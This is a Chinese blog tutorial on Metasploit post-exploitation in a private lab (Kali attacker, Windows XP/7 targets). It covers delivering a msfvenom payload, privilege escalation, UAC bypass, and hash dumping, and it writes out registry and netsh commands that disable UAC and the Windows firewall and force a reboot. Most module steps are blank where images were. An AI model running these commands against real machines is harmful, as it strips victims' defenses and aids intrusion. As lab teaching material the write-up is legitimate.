经验首页 前端设计 程序设计 Java相关 移动开发 数据库/运维 软件/图像 大数据/云计算 其他经验
当前位置:技术经验 » 其他 » 网络安全 » 查看文章
Metasploit Framework(8)后渗透测试(一)
来源:cnblogs  作者:一清  时间:2018/11/9 11:12:21  对本文有异议

文章的格式也许不是很好看,也没有什么合理的顺序

完全是想到什么写一些什么,但各个方面都涵盖到了

能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道

 

使用场景:

Kali机器IP:192.168.163.132

WindowsXP机器IP:192.168.163.134

 

如果以及获取了目标服务器的控制权之后,如何扩大战果?

所以我们首先需要一个已经获取了控制权的目标机器

我直接用msfvenom工具来生成:这里的参数我在前面介绍过了,不再多说

 

然后我利用Apache传给WindowsXP机器:

 

OK,打开WindowsXP的浏览器:

浏览器访问:http://192.168.163.132/payload.exe

下载好这个Payload

 

然后Kali监听4444端口:

 

然后打开这个payload.exe:

OK,获取了shell:

 

 

接下来就介绍一些方式来“扩大战果”:

如果我们获取的不是管理员权限,那么能做的操作很少:

这样我们就可以用getsystem来提权:

但是这里失败了,被UAC阻止了,那么有没有方法绕过呢?

 

绕过UAC限制:

写完文章后我特意查了下:WindowsXP没有UAC,Win7之后才有UAC的,所以下面很多我失败了,但后来在Win7目标机器上我成功了

第一种:

 

 

然而目标机器弹出一个窗口:

 

显然这种方式被目标发现了,不适用

 

第二种:

 

很难受,XP系统不适用

 

第三种:

 

 

其实本质上和第二种一样,只不过第二种上传的是exe,这种上传的是DLL

遗憾,还是不适用与windowsXP电脑,不过在windows7上适用

 

除了绕过UAC以外,还可以更直接一些:

 

利用漏洞直接提权为系统:

以下几种方式都是针对Win7的漏洞,WindowsXP没用,不过可以用Win7来试试

第一种:

 

第二种:

 

第三种:

 

第四种:

 

 

其实获取的shell也可以是图形化的,这里顺便介绍下图形化的Payload

 

设置好这些参数之后,就可以远程操作WindowsXP电脑了

但是要注意设置viewonly这个参数,否则就是只能看着不能上

 

获取HashDump以及利用:

继续用我开头的payload.exe来方便地获取shell做下面地演示:

 

然后把这些HashDump复制出来

接下来选取其中一个来利用:

解释下面这个情况:我第一次失败发现是没有设置Payload,第二次依然失败,于是想到是否需要关闭UAC才行

 

接下来将如何在meterpreter里面关闭UAC:

关闭UAC:

调出Meterpreter:

  1. shell
  2. cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
  3. cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
  4. shutdown -r -t 0

 

写完这三行之后,目标机器会关机,我手动重启对方机器

然后再exploit就可以成功

 

当我们拿到了目标机器的Shell之后,首先就要想到的是:

 

关闭目标机器的防火墙:(适用于Win7及以上)

想要关闭防火墙需要有系统权限,可以采用我上边提到的方法试一试

  1. netsh advfirewall set allprofiles state on
  2. netsh advfirewall set allprofiles state off

 

打开meterpreter,migrate到系统进程,提权到系统

然后调出shell:输入上边的这两个命令

 

关于Metasploit Framework的内容我就先写到这里了,接下来我想看看Web渗透或者是SQL注入

关于MSF后渗透方面我会在后边再次介绍

 友情链接:直通硅谷  点职佳  北美留学生论坛

本站QQ群:前端 618073944 | Java 606181507 | Python 626812652 | C/C++ 612253063 | 微信 634508462 | 苹果 692586424 | C#/.net 182808419 | PHP 305140648 | 运维 608723728

W3xue 的所有内容仅供测试,对任何法律问题及风险不承担任何责任。通过使用本站内容随之而来的风险与本站无关。
关于我们  |  意见建议  |  捐助我们  |  报错有奖  |  广告合作、友情链接(目前9元/月)请联系QQ:27243702 沸活量
皖ICP备17017327号-2 皖公网安备34020702000426号